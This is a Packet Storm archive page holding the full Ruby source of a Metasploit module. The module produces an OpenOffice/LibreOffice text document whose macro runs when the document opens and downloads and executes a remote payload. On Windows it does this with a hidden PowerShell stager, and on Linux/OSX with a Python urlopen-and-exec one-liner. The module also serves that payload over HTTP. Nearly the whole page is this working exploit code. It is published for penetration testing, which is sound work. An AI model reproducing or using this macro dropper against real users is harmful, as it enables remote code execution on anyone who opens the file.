what you don't know can hurt you

Apache OpenOffice Text Document Malicious Macro Execution

Apache OpenOffice Text Document Malicious Macro Execution
Posted Feb 10, 2017
Authored by sinn3r | Site metasploit.com

This Metasploit module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning. The module also works against LibreOffice.

tags | exploit
MD5 | 79e465107cfd91f5c5020df4f837616e

Apache OpenOffice Text Document Malicious Macro Execution

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/zip'
require 'cgi'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer

WINDOWSGUI = 'windows'
OSXGUI = 'osx'
LINUXGUI = 'linux'

def initialize(info={})
super(update_info(info,
'Name' => "Apache OpenOffice Text Document Malicious Macro Execution",
'Description' => %q{
This module generates an Apache OpenOffice Text Document with a malicious macro in it.
To exploit successfully, the targeted user must adjust the security level in Macro
Security to either Medium or Low. If set to Medium, a prompt is presented to the user
to enable or disable the macro. If set to Low, the macro can automatically run without
any warning.

The module also works against LibreOffice.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r' # Metasploit
],
'References' =>
[
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => false
},
'Targets' =>
[
[
'Apache OpenOffice on Windows (PSH)', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}],
[
'Apache OpenOffice on Linux/OSX (Python)', {
'Platform' => 'python',
'Arch' => ARCH_PYTHON
}]
],
'Privileged' => false,
'DisclosureDate' => "Feb 8 2017"
))

register_options([
OptString.new("BODY", [false, 'The message for the document body', '']),
OptString.new('FILENAME', [true, 'The OpoenOffice Text document name', 'msf.odt'])
], self.class)
end


def on_request_uri(cli, req)
print_status("Sending payload")

if target.name =~ /PSH/
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
else
p = payload.encoded
end

send_response(cli, p, 'Content-Type' => 'application/octet-stream')
end


def primer
print_status("Generating our odt file for #{target.name}...")
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'openoffice_document_macro')
docm = package_odt(path)
file_create(docm)
end


def get_windows_stager
%Q|Shell("cmd.exe /C ""#{generate_psh_stager}""")|
end


def get_unix_stager
%Q|Shell("#{generate_python_stager}")|
end


def generate_psh_stager
@windows_psh_stager ||= lambda {
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(get_uri)
download_and_run = "#{ignore_cert}#{download_string}"
generate_psh_command_line(
noprofile: true,
windowstyle: 'hidden',
command: download_and_run)
}.call
end


def generate_python_stager
@python_stager ||= lambda {
%Q|python -c ""import urllib2; r = urllib2.urlopen('#{get_uri}'); exec(r.read());""|
}.call
end


def get_statger
case target.name
when /PSH/
get_windows_stager
when /Python/
get_unix_stager
end
end


# This macro code has the following in mind:
# 1. It checks the platform to eliminate less misfires. Since we have only tested on Windows/Linux/OSX,
# we only want to fire at those.
# 2. Originally, I tried to embed the payload in the macro code, write it out and then execute it.
# This turned out to be problematic, because for some reason OpenOffice is not able to
# write a large string to a file (I've tried either shell("echo") or using the macro API).
# The stager code is similar to web_delivery.
def macro_code
CGI.escapeHTML(%Q|
Sub OnLoad
Dim os as string
os = GetOS
If os = "#{WINDOWSGUI}" OR os = "#{OSXGUI}" OR os = "#{LINUXGUI}" Then
Exploit
end If
End Sub

Sub Exploit
#{get_statger}
End Sub

Function GetOS() as string
select case getGUIType
case 1:
GetOS = "#{WINDOWSGUI}"
case 3:
GetOS = "#{OSXGUI}"
case 4:
GetOS = "#{LINUXGUI}"
end select
End Function

Function GetExtName() as string
select case GetOS
case "#{WINDOWSGUI}"
GetFileName = "exe"
case else
GetFileName = "bin"
end select
End Function
|)
end

def on_file_read(short_fname, full_fname)
buf = File.read(full_fname)

case short_fname
when /content\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /Module1\.xml/
buf.gsub!(/CODEGOESHERE/, macro_code)
end

yield short_fname, buf
end


def package_odt(path)
zip = Rex::Zip::Archive.new

Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')

if File.directory?(file)
print_status("Packaging directory: #{file}")
zip.add_file(p)
else
on_file_read(p, file) do |fname, buf|
print_status("Packaging file: #{fname}")
zip.add_file(fname, buf)
end
end
end

zip.pack
end


def exploit
super
end

end
Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close